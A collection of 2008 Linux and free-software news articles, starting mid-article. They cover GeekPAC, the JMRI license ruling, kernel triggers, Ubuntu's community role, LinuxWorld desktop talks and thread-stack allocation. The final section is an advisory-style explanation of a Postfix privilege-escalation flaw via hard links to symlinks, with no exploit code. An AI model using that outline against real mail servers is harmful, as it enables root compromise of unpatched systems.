state, it was known as BytesFree — a similar group, but without the
political slant. Walker says he originally planned to stay with that name,
until he learned that the geek-pac.org domain was available, and then
everything fell into place. 

Walker formally launched GeekPAC at last week's LinuxWorld Expo by
hosting a Birds of a Feather get-together at the end of a long day of
sessions. While current and would-be volunteers strategized and planned,
Walker took a few minutes to share the group's vision with notable
columnist and FOSS supporter Doc Searls. 

Though GeekPAC's premise is strong, not everyone is convinced of its
viability. LinuxWorld community blogger Don Marti says
the idea is likely to fail, in part, because of a poor choice of names. He
claims the inclusion of the term "geek" is insulting and suggests it
doesn't relay the true goals of the group. 

"Creative Commons is a great name. Electronic Frontier Foundation is
pretty good," Marti suggests. "You have to get in some words that imply
that the people in the organization actually make something useful and that
the organization's goals are public goods. Network Growth and Productivity
Council?"  

Marti also notes that GeekPAC should include singers, podcasters, and
other sub-groups affected by information rights. Though the underlying
commonality among the members of GeekPAC is an understanding of how these
issues impact the FOSS community, Marti says that's not enough of a reason
to form a splinter group of nothing but techies. 

"There's a community that already exists around these issues — why
split off the subset of EFF supporters who happen to be into free
software?" asks Marti. "Of course EFF itself can't be involved because
they're tax-exempt, but the target is clearly the same people, and their
friends and colleagues. A 'free software users for DMCA reform' group would
be like 'cat owners for a balanced budget'." 

At the end of the day, it won't be the group's name or membership
demographic that decides GeekPAC's success. Walker says it will be "When
politicians and candidates start referencing us by name because our
influence is large enough to matter." 


		Why the JMRI decision matters


The Java Model Railroad
Interface (JMRI) project is not one to sit at the 
top of the Debian popularity contest results; it provides tools for model
railroad enthusiasts.  But the legal wrangling around JMRI has made it one
of the more important projects in our community at this time.  JMRI has
suffered some legal setbacks, but much of that was turned around by the US
Federal Circuit Court of Appeals on August 13.  The result is a
vindication for much of the legal reasoning behind free software licenses.


JMRI was charged with patent
infringement back in 2006.  As part of the legal counterattack, JMRI
developer Robert Jacobson charged patent holders Michael Katzer and Kamind
Associates, Inc. with copyright infringement for its use of JMRI code.  The
Federal District Court in this case had concluded that the terms of the
Artistic License were contract terms, and not conditions on the copyright
license itself.  


That ruling was seen as a major setback.  The authors of free software
licenses have gone to great lengths to restrict themselves to copyright
licensing and to avoid contract law altogether.  There are a couple of
important reasons for this:


 A contract is only binding if all parties have voluntarily entered
     into it.  There have been mutterings from some corners for years that
     licenses like the GPL are not truly enforceable because the recipients
     of software under those licenses have never signed the relevant
     contracts.  Such mutterings have become relatively hard to hear, but
     they are still out there.  A software license is, 
     instead, a unilateral grant of privilege which does not require
     agreement.  As such, it should be easier to enforce.

 Violation of the terms of a contract sets up the guilty party to be
     sued for damages.  Copyright infringement, instead, allows for
     injunctive relief, allowing the copyright owner to immediately shut
     down the infringing activity.  Many of those who would ignore the
     terms of free software licenses fear injunctions far more than they
     fear suits for damages.


Both points are crucial.  If you look at clause 5 of the GNU General Public
License (version 2, in this case), you read:


	You are not required to accept this License, since you have not
	signed it.  However, nothing else grants you permission to modify
	or distribute the Program or its derivative works.  These actions
	are prohibited by law if you do not accept this License.


Anybody who distributes a copyrighted work will be doing so in violation of
the author's exclusive rights.  If a distributor has a license from the
owner, though, then this distributor has a legal defense.  The question
raised in this case was, in summary, this: if somebody distributes free
software without adhering to the terms of the license, does that somebody
still have a license at all?  The District Court ruled that this
person did, indeed, still have a license to distribute the software, though
they might be liable for damages for not having followed all of the terms.
The Appeals Court, instead, said that failure to hold to the conditions
meant that the license simply did not exist; distributing free software in
a manner contrary to its license is copyright infringement, not breach of
contract.

This decision was reached in a sufficiently high court that the
conversation should be finished in the United States; we now have a
high-level legal precedent that software licenses are licenses, and
that they can be enforced with injunctions.  In US-style law, precedents
are everything; the absence of a clear precedent always causes a certain
degree of legal uncertainty.   We now have that precedent; as a result,
anybody seeking to enforce a free software 
license in the US is now standing on firmer ground.

There are some other interesting conclusions to be drawn from this ruling.
Copyright law in the US does not recognize any sort of moral rights to
copyrighted works; it is, in classic American style, all about the
protection of economic rights.  Some have argued that, since free software
is, well, free of charge, there is no economic harm in violating its
licenses, and, thus, copyright law has nothing to say.  But the Appeals
Court saw things differently, stating that there was a clear economic
interest in the Artistic License:


	The clear language of the Artistic License creates conditions to
	protect the economic rights at issue in the granting of a public
	license. These conditions govern the rights to modify and
	distribute the computer programs and files included in the
	downloadable software package. The attribution and modification
	transparency requirements directly serve to drive traffic to the
	open source incubation page and to inform downstream users of the
	project, which is a significant economic goal of the copyright
	holder that the law will enforce. 


So the reasoning that free software licenses are unenforceable due to the
lack of an economic interest fails to hold water.  Similarly, the
interesting idea that free software license incompatibility does not really
exist, recently promoted on
LWN by Bryan Cantrill, seems unlikely to stand up to serious scrutiny.


Some voices on the net have worried that this ruling could also give
sharper teeth to exploitive proprietary end user license agreements.  The
Electronic Frontier Foundation is one
example:


	While we're pleased to see a panel of learned judges endorse the
	legal foundations of the open source software paradigm, the
	decision may also encourage proprietary software vendors who
	frequently fill their "end user license agreements" with
	restrictions that are denominated as "conditions" on the license.
	
	If violating a "condition" in a EULA results in copyright
	infringement liability, what's to stop a software vendor from
	imposing conditions that are unrelated to copyright law (e.g. an
	agreement not to disparage the copyright owner, or to wear pink
	bunny ears on Tuesdays), or even antithetical to copyright law
	(e.g. a waiver of fair use rights)?


If this comes to pass, restrictions on reverse engineering, publication of
reviews, lack of bunny ears, etc. may, indeed, become easier to enforce.  Such an
outcome would not 
necessarily be a bad thing for users of free software, though.  If
anything, it will simply make the value of freedom that much more clear.


Finally, it is worth noting well that this outcome did not just happen on
its own.  Behind the scenes, concerned lawyers from groups like the
Stanford Center for Internet and Society and the Electronic Frontier
Foundation, who have understood all along what was at stake here, have
put in a great deal of work to get this ruling.  They were successful
despite the fact that the old Artistic License was not the strongest
position to be arguing from.  Many of us would prefer to
not have to think about legal issues much of the time.  But we should be
happy and grateful that some very capable people have been willing to put
in the effort to defend our rights in cases like this one.

(The full ruling is available in PDF format,
or in
plain text on Groklaw).

		Triggers: less busy busy-waiting


Kernel code must often wait for something to happen elsewhere in the
system.  The preferred way to wait is to use any of a number of interfaces
to wait queues, allowing the processor to perform other tasks in the
meantime.  If the kernel code in question is running in an atomic mode, though,
it cannot block, so the use of wait queues is not an option.
Traditionally, in such situations, the programmer simply must code a busy
wait which sits in a tight loop until the required event takes place.

Busy waits are always undesirable, but, in some situations, they become
even more so.  If the wait is going to be relatively long, it would be
better to put the processor into a lower power state.  After all, nobody
cares if it executes its empty loop at full speed, or, even, whether the
loop executes at all.  If the wait is running within a virtualized guest,
the situation can be even worse: by looping in the processor, a busy wait
can actively prevent the running of the code which will eventually provide
the event which is being waited for.  In a virtualized environment, it is
far better to simply suspend the virtual system altogether than to let it
busy wait.

Jeremy Fitzhardinge has proposed a solution to this problem in the form of
the trigger API.  A trigger
can be thought of as a special type of continuation intended for use in a
specific environment: situations where preemption is disabled and sleeping
is not possible, but where it is necessary to wait for an external event.


A trigger is set up in either of the two usual patterns:


There is a sequence of calls which must be made by code intending to
wait for a trigger:


Triggers are designed to be safe against race conditions, in that if a
trigger is fired after the trigger_reset() call, the subsequent
trigger_wait() call will return immediately.  As with any such
primitive, false "wakeups" are possible, so it is necessary to check for
the condition being waited for and wait again if need be.

Code which wishes to signal completion to a thread waiting on a trigger
need only make a call to trigger_kick().


This code should, of course, ensure that the waiting thread will see that
the resource it was waiting for is available before calling
trigger_kick().

A reader of the generic implementation of triggers may be forgiven for
wondering what the point is; most of the functions are empty, and
trigger_wait() turns into a call to cpu_relax().  In
other words, it's still a busy wait, just like before except that now it's
hidden behind a set of trigger functions.  The idea, of course, is that
better versions of these functions can be defined in architecture-specific
code.
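
As a rough illustration of the generic case described above, here is a minimal user-space sketch.  The function names trigger_reset(), trigger_wait() and trigger_kick() come from the text; the trigger_t type, the signatures, and the wait_for_flag() and signal_flag() helpers are assumptions made for this example and are not the proposed kernel API.  It only shows the shape of the pattern: arm the trigger, recheck the condition, and wait again if it has not yet been met.

```c
#include <assert.h>
#include <stdatomic.h>
#include <stdbool.h>

/* Hypothetical stand-in type; the real trigger type is not shown here. */
typedef struct { int unused; } trigger_t;

/* Stand-in for the kernel's cpu_relax(): just a compiler barrier. */
static inline void cpu_relax(void)
{
    atomic_signal_fence(memory_order_seq_cst);
}

/* Generic versions: reset and kick do nothing, wait merely relaxes. */
static inline void trigger_reset(trigger_t *t) { (void)t; }
static inline void trigger_wait(trigger_t *t)  { (void)t; cpu_relax(); }
static inline void trigger_kick(trigger_t *t)  { (void)t; }

/* Waiter: re-arm, recheck the condition, wait; returns the wait count. */
static unsigned wait_for_flag(trigger_t *t, atomic_bool *ready)
{
    unsigned waits = 0;

    for (;;) {
        trigger_reset(t);
        if (atomic_load_explicit(ready, memory_order_acquire))
            break;
        trigger_wait(t);    /* false wakeups are fine: we loop */
        waits++;
    }
    return waits;
}

/* Signaller: make the condition visible first, then kick the waiter. */
static void signal_flag(trigger_t *t, atomic_bool *ready)
{
    atomic_store_explicit(ready, true, memory_order_release);
    trigger_kick(t);
}
```

With these do-nothing definitions the loop is an ordinary busy wait; an architecture-specific or hypervisor-backed trigger_wait() would be where the real savings come from.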

If the target architecture is actually a virtual machine environment, for
example, a
trigger can simply suspend the execution of the machine altogether.  To
that end, there is a new set of paravirt_ops allowing hypervisors to
implement the trigger operations. 

Jeremy has also created an implementation for the x86 architecture which
uses the relatively new monitor and mwait instructions.
In this implementation, a trigger is a simple integer variable.  A call to
trigger_reset() turns into a monitor instruction,
informing the processor that it should watch out for changes to that
integer variable.  The mwait instruction built into
trigger_wait() halts the processor until the monitored variable is
written to.  No more busy waiting is required.

There is a certain elegance to the monitor/mwait
implementation, but Arjan van de Ven worries that it may prove to be too slow.  So
changes to the x86 implementation are possible.  There have not been a lot
of comments about the API itself, though, so the trigger functions may well
make it into the mainline in something close to their current form.

		In defense of Ubuntu


Criticisms of the Ubuntu distribution and Canonical, its corporate
sponsor, are not hard to come by.  Depending on who is speaking, Ubuntu and
Canonical are guilty of profiting from the free software community without
giving back to it, forking important projects or distributions,
legitimizing the use of binary-only system components, and more.  Of all of
these gripes, it is the "contributing to the community" complaint which is
heard most.  If one believes these complaints, Ubuntu is a parasitic
operation which does not understand how the community works and which is
harmful to the community as a whole.

Your editor would like to submit that these charges are overblown.  Ubuntu
is far from perfect, and it could certainly give back more than it does,
but Ubuntu does not deserve the level of opprobrium it is receiving from
certain parts of our community.


It is interesting to note that there appears to be a special place for
distributors among those who would criticize.  Red Hat, it has been said,
drives things toward its own profit and has, in the past, pushed far too
much bleeding-edge software on its long-suffering users.  Fedora is accused
of remaining insufficiently open, excessively bleeding-edge, and refusing
to make the watching of flash videos just work.  Novell/SUSE has done a
deal with the devil.  Debian, we are told, is simultaneously too chaotic
and too bureaucratic, and it can never get a release out on time.  Some
charge that Gentoo's community is dysfunctional, and that, in any case, it's
made up of people with too much time on their hands.  And Ubuntu stands
accused of taking the
work of others while failing to give back to or even credit the community
from which it draws its software.


It is not surprising that distributors are specially blessed with this sort
of criticism.  Most free software users never deal directly with the
upstream projects which create the software they use.  Instead, they get it
all from a single middleman - the distributor.  So the distributor has a
great deal of influence over what kind of experience those users
have; the distributor is also the obvious guilty party when things seem to
go wrong.  Lots of people have opinions about their distributor, but they
know little about the projects that actually develop their software.

That said, much of the criticism of Ubuntu is coming from the developer
community, which does have a more detailed view of the full
ecosystem.  It is worth thinking about why that might be.  While Ubuntu's
contributions may not be as high as one might like, they are most certainly
not zero.  There are Ubuntu developers who are Debian developers, X.org
developers, GNOME developers, and so on.  If this page is to
be believed, Ubuntu developers are also contributing to the HURD.  The page
does not say why, sorry.

The developers who castigate Ubuntu are uniformly silent about the number
of kernel patches coming from the Mandriva camp.  They have nothing to say
about how much Xandros gives back to Debian.  Nobody totals up
contributions from Gentoo.  There are no complaints about Slackware's
presence in the community.  Arch Linux developers do not hear that they are
not doing enough.  There are no high-profile articles on how rPath is
taking advantage of free software developers.  Yet Ubuntu's contributions
most likely exceed those from all of the distributions named here, with the
possible (but far from certain) exception of Gentoo.  Ubuntu, it would
seem, is being held to a higher standard than many of its peers.

One reason for Ubuntu's special treatment must certainly be its nature as
the cool kid who showed up out of nowhere.  Sudden success can breed a
certain amount of animosity, especially when much of that success is
perceived to be built on the work of others.  It is a rare distribution
list which has not seen the occasional "I'm tired of your distribution, I'm
moving to Ubuntu now" message; that kind of stuff gets old after a while.
And when something gets old and irritating, it's tempting to respond in a
short-tempered way.


But the real reason must be elsewhere: Ubuntu has overtly set itself up to be
held to a higher standard.  It has been positioned as a strongly
community-oriented distribution with the mission of saving the world for
free software.  Debian-derived distributions which make less noise about
community - Xandros, say - receive less grief for their lack of
participation in the community.  Nobody expects anything from them, so
nobody complains.  But people do expect something different from
Ubuntu; it's supposed to be a part of our community.  So when it seems that
Ubuntu is not contributing patches upstream or that it's maintaining
forks of important software components, and when tools like Launchpad remain
proprietary, it feels like a promise has not been kept.


There is no doubt that Ubuntu could do better than it has.  But we should
not lose track of what Ubuntu has done.  Ubuntu has created a
distribution which appeals to a whole new class of Linux users.  The fact
that much of this work was done elsewhere notwithstanding, Ubuntu has shown
that a Linux system can wear a friendlier, easier-to-use face.  In the
process, it has made Debian suitable for a larger class of users.
Ubuntu has shown that a Debian-based distribution can make regular, stable
releases and still ship contemporary software.
Ubuntu has lived up to
its promises of support, including providing top-quality security
support.  And all of this is happening in a
way that, we are told, should become commercially self-sustaining at some
point.


On top of all this, Ubuntu employs a number of developers who work within
the community.  Yes, it would be a good thing if there were more of these
developers.  It would also be good if more fixes and enhancements escaped
Ubuntu's repositories and made it back upstream.  Ongoing encouragement at
all levels should help to make this happen.  But, as we encourage Ubuntu to
live up to its ambitious goals of being a full member of our community, we
should not lose our perspective.  We are, beyond doubt, richer as a result
of Ubuntu's existence.

		Desktop talks from LinuxWorld 2008 Conference


The LinuxWorld 2008 (August 4 - 7) Conference program
had plenty of talks that sounded interesting.  Unfortunately I only found
time to attend two talks, both from the Desktop Linux Track.

The first was from John Walicki, Open Client Architect at IBM, who presented
"Desktop Linux Architects Speak Out".  The second was from Don Hardaway and
Craig Van Slyke, professors at John Cook School of Business and Saint Louis
University, respectively, who entitled their talk "Open Source on the
Desktop: Why Not?".

There were a couple of common themes in both of these talks.  First was
that Linux is ready for the general desktop.  The second was that the
desktop effects of Compiz and similar technologies are vital for attracting
people to the Linux desktop.  Wobbly windows may not be very useful in
practice, but putting a presentation on a cube can be effective.  Mostly,
though, it's the "wow factor" that gets people's attention.

In many cases, open source applications are just as good as, or better than,
their proprietary counterparts.  Don and Craig did a study in
which they asked university business
students to recreate documents and spreadsheets that they had previously
done using MS Office.   Twenty-eight of 28 students thought that it was
just as easy to produce documents of equal quality with OOo Writer.  OOo
Calc was similarly approved by 26 of the 28 students.

There were areas where John Walicki thought Linux needed improvement.
Accessibility, making computers useful for people with disabilities, is an
important area, as is power management, making computing greener by using
less electricity.

Linux is greener when it comes to keeping old hardware working longer.
One big plus is collaboration: getting KDE applications to run seamlessly
on GNOME and vice versa, or having multiple distributions adopt a single
tool (upstart, PackageKit, etc.).  That collaboration enables the tools to
become much better, much faster.

John's assessment of the State of Linux Desktop is that it is growing, with
hot products that are making rapid changes.
Preloads are well established, and Linux
is the hottest technology in emerging markets, appliances, and green
computing.  His forecast is for steady growth.

Don Hardaway and Craig Van Slyke had a different perspective as academics.
They study people, and looked at why people choose one technology over
another.  Don presented the '3 leg stool' model for acceptance of
technology.  There are the 'tech leg', the 'people leg' and the
'organizational leg'.  The open source tech leg gets the most attention,
and the organizational leg is getting better, but the people leg has been
neglected.

The first thing about getting people to try new technologies is to realize
that people resist change.  However, the perception of risk is relative to
their knowledge.  Those of us who use open source technology on a regular
basis are comfortable with it, but for those who don't know anything about
it there is a perceived risk that makes them reluctant to try it.  If they
learn more about open source, the perception of risk is reduced.

There are stages in technology adoption.  First, people must be aware that
it exists.  Then something about it must attract their interest.  Once that
happens, they are more willing to evaluate the technology.  If the
evaluation is favorable, they will try it out.

Many of Don and Craig's students had never heard of Linux.  Once they had
heard, things like the desktop effects of Compiz got their interest.  Some
began to evaluate Linux, and some are probably still using it.

To gain the relative advantage, Linux must be better than the competition.
Linux costs less and is virus free, but, in the absence of a good image,
people will be 
reluctant to try it.  Craig thought gOS had a good image, but the
ease-of-use was not there in all cases.  Wireless, streaming media and some
applications were difficult for him to get going.  Craig found the EeePC
with Xandros was very easy to use and he got everything going without
resorting to the command line.  He thinks the Netbooks will give Linux
another boost.

So the average user might find sharper graphics appealing, but if things
don't work the way they expect or they have to resort to the command-line
to get it done, they won't switch.  To get more people to switch, a good first
step is to hand out live CD/DVDs to people that have never heard of Linux.
Explain that they can play around with Linux and then take the disc out of
the drive and reboot to whatever was there before.  If they realize that
Linux can also extend hardware life, they just might be sold.

		Tangled up in threads


Certain kinds of programmers are highly enamored with threads, to the point
that they use large numbers of them in their applications.  In fact, some
applications create many thousands of threads.  Happily for this kind of
developer - and their users - thread creation on Linux is quite fast.  At
least, most of the time.  A situation where that turned out not to be the
case gives an interesting look at what can happen when scalability and
historical baggage collide.

A user named Pardo recently noted that, in
some situations, thread creation time on x86_64 systems can slow
significantly - as in, by about two orders of magnitude.  He was observing
thread creation rates of less than 100/second; at such rates, the term
"quite fast" no longer applies.  Happily, Pardo also did much of the work
required to track down the problem, making its resolution quite a bit
easier.

The problem with thread creation is the allocation of the stack to be used
by the new thread.  This allocation, done with mmap(), requires
locating a few pages' worth of space in the process's address range.  Calls
to mmap() can be quite frequent, so the low-level code which finds
the address space for the new mapping is written to be quick.  Normally, it
remembers (in mm->free_area_cache) the address just past the
end of the previous allocation, which 
is usually the beginning of a big hole in the address space.  So allocating
more space does not require any sort of search.

The mmap() call which creates a thread's stack is special, though,
in that it involves the obscure, Linux-specific MAP_32BIT flag.
This flag causes the allocation to be constrained to the bottom 2GB of the
virtual address space - meaning it should really have been called
MAP_31BIT instead.  Thread stacks are kept in lower memory for a
historical reason: on some early 64-bit processors, context switches were
faster if the stack address fit into 32 bits.  An application involving
thousands of threads cannot help being highly sensitive to context switch
times, so this was an optimization worth making.

The problem is that this kind of constrained allocation causes
mmap() to forget about mm->free_area_cache; instead,
it performs a linear search through all of the virtual memory areas (VMAs)
in the process's address space.  Each thread stack will require at least
one VMA, so this search gets longer as more threads are created.  
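
To see why that search gets slower, consider the following toy model.  It is not kernel code: struct toy_vma and find_hole_linear() are names invented for this sketch, and the real kernel data structures are more involved.  The sketch walks a sorted array of mappings looking for the first hole of the requested size below a limit, counting how many entries it had to examine.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-in for a VMA: the half-open address range [start, end). */
struct toy_vma {
    unsigned long start;
    unsigned long end;
};

/*
 * Return the lowest address in [base, limit) where len bytes fit between
 * the (sorted, non-overlapping) mappings in v[], or 0 if nothing fits.
 * *steps is set to the number of mappings examined along the way.
 */
static unsigned long find_hole_linear(const struct toy_vma *v, size_t n,
                                      unsigned long base, unsigned long limit,
                                      unsigned long len, size_t *steps)
{
    unsigned long addr = base;
    size_t i;

    *steps = 0;
    for (i = 0; i < n; i++) {
        (*steps)++;
        if (v[i].end <= addr)
            continue;               /* mapping lies below the candidate */
        if (v[i].start >= limit)
            break;                  /* past the constrained region */
        if (v[i].start >= addr && v[i].start - addr >= len)
            break;                  /* found a big enough hole */
        addr = v[i].end;            /* try just past this mapping */
    }
    return (addr < limit && limit - addr >= len) ? addr : 0;
}
```

With thread stacks packed one after another, every new allocation has to step over all of the earlier ones, so the cost per allocation grows with the number of threads.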


Where things really go wrong, though, is when there is no longer room to
allocate a stack in the bottom 2GB of memory.  At that point, the
mmap() call will return failure to user space, which must then
retry the operation without the MAP_32BIT flag.  Even worse, the
first call will have reset mm->free_area_cache, so the retry
operation must search through the entire list of VMAs a second time before
it is able to find a suitable piece of address space.  Unsurprisingly,
things start to get really slow at that point.
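
The try-then-retry sequence described above looks roughly like the following from user space.  This is a minimal sketch and not the actual C library code; alloc_stack_low_first() is a name made up for this example, and MAP_32BIT is defined to zero on platforms that lack it so that the sketch still builds there.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>

#ifndef MAP_32BIT
#define MAP_32BIT 0     /* the flag only exists on x86-64 Linux */
#endif

/*
 * Ask for a stack in low memory first; if that fails, ask again
 * with no placement constraint.  Returns NULL if both attempts fail.
 */
static void *alloc_stack_low_first(size_t size)
{
    const int prot = PROT_READ | PROT_WRITE;
    const int flags = MAP_PRIVATE | MAP_ANONYMOUS;
    void *p;

    p = mmap(NULL, size, prot, flags | MAP_32BIT, -1, 0);
    if (p == MAP_FAILED)
        p = mmap(NULL, size, prot, flags, -1, 0);   /* the slow retry */
    return p == MAP_FAILED ? NULL : p;
}
```

Once the low region is full, every stack allocation pays for both calls, which is where the worst of the slowdown comes from.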


But the really sad thing is that the performance benefit which came from
using 32-bit stack addresses no longer exists with contemporary
processors.  Whatever problem caused the context-switch slowdown for larger
addresses has long since been fixed.  So this particular performance
optimization would appear to have become something other than optimal.


The solution which comes immediately to mind is to simply ignore the
MAP_32BIT flag altogether.  That approach would require that
people experiencing this problem install a new kernel, but it would be
painless beyond that.  Unfortunately, nobody really knows for sure when the
performance penalty for large stack addresses went away or how many
still-deployed systems might be hurt by removing the MAP_32BIT
behavior.  So Andi Kleen, who first implemented this behavior, has argued against its removal.  He also points
out that larger addresses could thwart a "pointer compression" optimization
used by some Java virtual machine implementations.  Andi would rather see
the linear search through VMAs turned into something smarter.


In the end, MAP_32BIT will remain, but the allocation of thread
stacks in lower memory is going away anyway.  Ingo Molnar has merged a single-line patch creating a new
mmap() flag called MAP_STACK.  This flag is defined as
requesting a memory range which is suitable for use as a thread stack, but,
in fact, it does not actually do anything.  Ulrich Drepper will cause glibc
to use this new flag as of the next release.  The end result is that, once
a user system has a new glibc and a fixed kernel, the old stack behavior
will go away and that particular performance problem will be history.


Given this outcome,
why not just ignore MAP_32BIT in the kernel and avoid the need
for a C library upgrade?  MAP_32BIT is part of the user-space ABI,
and nobody really knows how somebody might be using it.  Breaking the ABI
is not an option, so the old behavior must remain.  On the other
hand, one could argue for simply removing the use of MAP_32BIT in
the creation of thread stacks, making the kernel upgrade unnecessary.  As
it happens, switching to MAP_STACK will have the same effect;
older kernels, which do not recognize that flag, will simply ignore it.
But if, at some future point, it turns out there still is a performance
problem with higher-memory stacks on real systems, the kernel can be
tweaked to implement the older behavior when it's running on an affected
processor.  So, with luck, all the bases are covered and this particular issue
will not come back again.
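
For comparison, a stack allocation using the new flag might look like the sketch below.  The helper names are invented for this example, and MAP_STACK is defined to zero when the system headers do not provide it, which matches the flag's current do-nothing semantics.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>

#ifndef MAP_STACK
#define MAP_STACK 0     /* older headers: the flag is a no-op anyway */
#endif

/* Map an anonymous region meant to be used as a thread stack. */
static void *alloc_thread_stack(size_t size)
{
    void *p = mmap(NULL, size, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_STACK, -1, 0);

    return p == MAP_FAILED ? NULL : p;
}

/* Release a stack obtained from alloc_thread_stack(). */
static void free_thread_stack(void *stack, size_t size)
{
    int ret = munmap(stack, size);

    assert(ret == 0);
    (void)ret;
}
```

Since no placement constraint is requested, the kernel is free to use its cached free-area hint and the linear search is avoided.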

		Standards, the kernel, and Postfix


Standards like POSIX are meant to make life easier for application developers
by providing rules on the semantics of system calls for multiple different
platforms.  Sometimes, though, operating system developers decide to change
the behavior of their platform—with full knowledge that it breaks
compatibility—for various reasons.  This requires
application developers to notice the change and take appropriate action;
not doing so can lead to a security hole like the one found in the Postfix 
mail transfer agent (MTA) recently.  


The behavior of links created using the link() system call on Linux,
Solaris, and IRIX is what tripped up Postfix.  In particular, the question
is what happens when a hard link is made to a symbolic link.  Many long-time UNIX
hackers don't realize that you can even do that, nor what to expect if you
do.  Postfix relied on a particular, standard-specified behavior that many
operating systems, including early versions of Linux, follow.


Links can be a somewhat confusing, or possibly unknown, part of UNIX-like
filesystems, so a bit of explanation is in order.  A link created with
link()—also known as a hard link—is an alias for a
particular file.  It simply gives an additional name by which a particular
chunk of bytes on the disk can be referenced.  For example:

	link("/path/to/foo", "/link/to/foo");

creates a second entry in the filesystem (called /link/to/foo)
which points to the same file as
/path/to/foo.  The file being linked to must exist and reside on
the same filesystem as the link.


Symbolic links, on the other hand, are aliases of a different sort.  A
symbolic link creates a new entry (e.g. inode) in the filesystem which
contains the path of the linked-to file as a string.  There is no
requirement that the file exist or be on the same filesystem—the only
real requirement is that the path conform to standard pathname rules.
The symlink() system call is used to create them.

Both symbolic links and hard links can also be created from the command line
using the ln command (adding a -s option for symbolic
links).
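
The difference between the two kinds of link can be seen with a small test program.  The sketch below is only an illustration: link_demo() and the file names foo, hard and soft are made up for this example.  It creates a file, a hard link to it, and a symbolic link to it, then reports whether the hard link shares the file's inode and what path the symbolic link stores.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * In directory dir, create "foo", a hard link "hard" and a symbolic
 * link "soft".  On success, *same_inode says whether foo and hard are
 * the same file, and target holds the path stored in soft.
 * Returns 0 on success, -1 on failure; the files are removed again.
 */
static int link_demo(const char *dir, int *same_inode,
                     char *target, size_t tlen)
{
    char foo[PATH_MAX], hard[PATH_MAX], soft[PATH_MAX];
    struct stat a, b;
    ssize_t n = -1;
    int fd, ret = -1;

    snprintf(foo, sizeof(foo), "%s/foo", dir);
    snprintf(hard, sizeof(hard), "%s/hard", dir);
    snprintf(soft, sizeof(soft), "%s/soft", dir);

    fd = open(foo, O_CREAT | O_WRONLY, 0600);
    if (fd < 0)
        return -1;
    close(fd);

    if (link(foo, hard) == 0 && symlink(foo, soft) == 0 &&
        stat(foo, &a) == 0 && stat(hard, &b) == 0) {
        /* A hard link is the same inode under another name. */
        *same_inode = (a.st_dev == b.st_dev && a.st_ino == b.st_ino);
        /* A symbolic link just stores a path string. */
        n = readlink(soft, target, tlen - 1);
        if (n >= 0) {
            target[n] = '\0';
            ret = 0;
        }
    }
    unlink(soft);
    unlink(hard);
    unlink(foo);
    return ret;
}
```

The equivalent from the shell would be ln for the hard link and ln -s for the symbolic one.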


So, when making a hard link to a symbolic link, there are two choices:
either follow the symbolic link to its, possibly nonexistent, target and
link to that or
link to the symbolic link inode itself.  POSIX requires that the symbolic
link be fully resolved to an actual existing file, which is the behavior
that Postfix relies upon.


The exact
sequence of events is lost in the mists of time, but Linux changed to
non-standard behavior—at least partially for compatibility with
Solaris—in kernel version 1.3.56 (which was released in January
1996).  Some discussion
prior to that change adds an additional reason for it: user space has no
way to make a link to a symbolic link without it.  Some saw that as a flaw
in the interface and proposed the change.  An application developer that
wanted the 
original behavior would be able to implement it by resolving any symbolic
links before making the hard link.
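
Both points can be sketched in a few lines of C.  The function names below are invented for this example.  link_keeps_symlink() checks which behavior the running system has by hard-linking a symbolic link and looking at what was created; link_resolved() gets the original behavior by resolving the old name with realpath() before calling link().

```c
#define _GNU_SOURCE
#include <assert.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Returns 1 if link() applied to a symbolic link creates a second name
 * for the symbolic link itself, 0 if it links to the target file, and
 * -1 on error.  Works in (and cleans up after itself in) dir.
 */
static int link_keeps_symlink(const char *dir)
{
    char file[PATH_MAX], soft[PATH_MAX], hard[PATH_MAX];
    struct stat st;
    int fd, result = -1;

    snprintf(file, sizeof(file), "%s/file", dir);
    snprintf(soft, sizeof(soft), "%s/soft", dir);
    snprintf(hard, sizeof(hard), "%s/hard", dir);

    fd = open(file, O_CREAT | O_WRONLY, 0600);
    if (fd < 0)
        return -1;
    close(fd);

    if (symlink(file, soft) == 0 && link(soft, hard) == 0 &&
        lstat(hard, &st) == 0)
        result = S_ISLNK(st.st_mode) ? 1 : 0;

    unlink(hard);
    unlink(soft);
    unlink(file);
    return result;
}

/* Resolve every symbolic link in oldname first, then make the link. */
static int link_resolved(const char *oldname, const char *newname)
{
    char *real = realpath(oldname, NULL);   /* malloc()ed by realpath */
    int ret;

    if (real == NULL)
        return -1;      /* e.g. a dangling symbolic link */
    ret = link(real, newname);
    free(real);
    return ret;
}
```

Note that resolving and then linking is two separate steps, so the path could change in between; a security-sensitive program would need to account for that.  On newer Linux kernels, linkat() with the AT_SYMLINK_FOLLOW flag is another way to request the following behavior.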


To further complicate things, it appears that the POSIX behavior was
restored in the 2.1 development series, only to be changed back in late 1998.
This change led to the comments currently in fs/namei.c for
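the function implementing link():

	/*
	 * Hardlinks are often used in delicate situations.  We avoid
	 * security-related surprises by not following symlinks on the
	 * newname.  --KAB
	 *
	 * We don't follow them on the oldname either to be compatible
	 * with linux 2.0, and to avoid hard-linking to directories
	 * and other special files.  --ADM
	 */
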
Where oldname is the file being linked to and newname
is the name being 
created.  For the curious, KAB is Kevin Buhr and ADM is Alan Modra.


Unfortunately, according to Postfix author Wietse Venema, the
link(2) man page 
didn't change until sometime in 2006. This makes it fairly difficult for
application developers to learn about the change, especially because they
may not follow kernel development closely.


Postfix allows root-owned symbolic links to be used as the target for local
mail delivery, specifically to handle things like /dev/null on
Solaris, which is a symbolic link.
Because an attacker can make a link to a root-owned symbolic link on
vulnerable systems, Postfix can get confused and deliver mail to files that
it shouldn't.
This can lead to privilege escalation (via executing code as root)
by making a hard link to
a symbolic link that points to an init script (CVE-2008-2936).


As Venema outlines in the Postfix
security advisory, the problem can be resolved by requiring that
symbolic links used for local delivery reside in a directory that is only
writeable by root. 
It is not a perfect solution, though: "This change will break
legitimate configurations that deliver mail 
to a symbolic link in a directory with less restrictive
permissions." 
There are other workarounds for people who don't want to use the provided
